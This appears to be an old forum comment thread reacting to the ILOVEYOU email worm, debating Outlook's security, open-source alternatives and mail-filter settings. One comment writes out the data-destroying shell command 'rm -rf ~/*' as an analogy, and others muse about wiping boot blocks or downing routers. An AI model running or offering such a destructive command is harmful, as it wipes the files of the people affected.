Destroys all MP3's on the system, hunh? Looks like Metallica is finally starting to wise up and fight dirty. . .
I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?
What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'
The findings of fact have nothing to do with this. Microsoft certainly has better things to do then create trojans and virii for it's users. This black helicopter mentality is simply foolish
A new variant is already making the rounds. Does anyone know the best way to configure sendmail to reject ALL Visual Basic attachments?
The new variant uses a subject of "fwd: Joke"
Many PCS cell phones now have email to text message gateways, and I'm sure that some PCS phones' email addresses are in some peoples' lists...
Are we going to be hearing about PCS systems crashing under heavy load of I-LOVE-YOU text messages?
Tarsnap: Online backups for the truly paranoid
How?!
The user saved the attachment on the unix server, ftp'd it to his windows box and ran it!
Could you possibly more vague? What is it that microsoft has to do? Work on the best office suite? Best Web browser? Most popular operating system? Perhaps they should be focusing more on the X-box? Or Whistler?
Or should they be spearheading breakthrough innovations like bundling software made by someone else, and slapping a Redhat logo on it?
I'm sure the author of this program is going to be extremely upset when he finds out about all the people illegally distributing his copyrighted work!
Maybe he can hire NetPD to find out who the people distributing his vb script are.
I hope this gets stopped before it sets more of a precedent for people to just ignore copyright laws.
But what damage could a .sh do in, say, Pine?
Well, not a lot; the script would be shown; you have the option of viewing it and then, if you like, save and run....
But the fact is, any high-exposure software (mail-client, Napster, whatever) is vulnerable, not just because it runs under a single-user OS, but because it's a prime target; who'd bother exploiting a weakness in kmail / elm / pine / etc?
This isn't of course forgetting (OSS)sendmail's many security holes... it also is high-exposure, and often runs as root(0)... Why bother with file permissions when you've got an exploit letting you become God?
Okay, it's easy when a Windows user is root by default.
What I'm saying is:
It's not just M$ / closed software which is vulnerable to this kind of exploit; anything in wide use is the main target.
This means that OSS is far from invincible to this kind of attack - especially as it gets more popular - sendmail is an old and tried example of this. Worth bearing in mind before we slam Closed / M$ software for being so buggy
This doesn't excuse M$ for allowing Outlook to run these scripts any more than it excuses sendmail authors from their responsibility.
Yrs, Steve.
Author, Shell Scripting : Expert Re
I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.
I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.
www.eFax.com are spammers
If you want to get people to change their behavior you have to do more than tell them to stop the "bad" behavior. You have to give them a "good" alternative.
Instead of saying "I told you Microsoft was bad." we should be saying "Switch to Linux so you won't be vulnerable to this class of attack."
(Sure there are attacks that are possible on Linux. But they're fewer, and a damned sight harder to pull off. Microsoftware, on the other hand, has gaping holes all over the place, and no way for anybody who doesn't work for Bill's company, or hand-in-glove with it, to fix them.)
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Think about how what you're suggesting isn't what I'm suggesting. Each program ought to be given its own space to poop in, but there's no reason for them to poop globally on the system as a whole. Any of that ought to be determine upon installing the software initially, which is presumably done by an intelligent and informed user or superuser.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
Alright, i wrote a small vbs file and emailed it to myself, to see if any of the FUD here is true.
First of all, IT DOES *NOT* EXECUTE AUTOMATICALLY IN THE PREVIEW PANE!!! I don't know what you people are talking about! I have to click on the attachment-button, then click on "Excel.VBS" in the drop-down menu.
It then pops up a dialog that says:
"Open Attachment Warning
Opening:
EXCEL.VBS
Some files can contain viruses or otherwise be harmful to your computer. It is important to be certain that this file is from a trustworthy source.
What would you like to do with this file?
[ ] Open it
[x] Save it to disk
[x] Always ask before opening this type of file"
You have to choose "Open it" then click "OK", then it runs.
That's a pretty stern warning, but people ignore it because it's from someone they know. You would think that people would learn after the melissa worm. Don't run ANY files you recieve in email without confirmation first.
-------------
The following sentence is true.
The following sentence is true. The preceding sentence was false.
1) "This script is attempting to send mail, would you like to allow it?"
2) "This script is attempting to modify the hard disk, would you like to allow it?"
3) "This script is attempting to modify your startup programs, would you like to allow it?"
Pretty easy, ne? Maybe I should email them :P
-------------
The following sentence is true.
The following sentence is true. The preceding sentence was false.
Colin,
:-(
Writing things like this in Visual Basic is easy.
But one of these days, some really expert programmer with a nasty intent is going to write a virus that is extremely insidious and start literally shutting down hardware that works on the various layers of the OSI networking model. Given that routers ARE computers of sorts, let's see how long before someone could bring down much of the Internet by bringing down a major backbone provider such as UUNet.
Raymond in Mountain View, CA
The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.
File with .pl extension and content-type "application/octet-stream" is never executed by any decent mailreader -- mailreader even will warn you that there is no viewer defined for this content-type. If someone had "application/x-perl" in .mailcap pointing to "/bin/perl %s" (mailreaders never write files with executable permissions), AND it was used in the mail header, then and only then it will run, however no sane person will do such a thing and no system comes with this kind of configuration.
Contrary to the popular belief, there indeed is no God.
ILOVEYOU spread across the whole world in just a few hours. What if something like this killed the host an hour or two after infection? By the time it destructed, it would already have several generations of offspring.
---
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
I'd have just overwritten the boot block, fucked up the FATs, and written pseudorandom gibberish on their C: drive... But I'm cruel like that.
;)
Don't gloat too loudly
Your Working Boy,
Of course, this could mean an arrest in 24 hours.
*Carlos: Exit Stage Right*
"Geeks, Where would you be without them?"
*Carlos: Exit Stage Right*
"Geeks, Where would you be without them?"
"Got Linux?"
Take a look at it here.
You know what to do with the HELLO.
You know what to do with the HELLO. ...
Help create an open-source world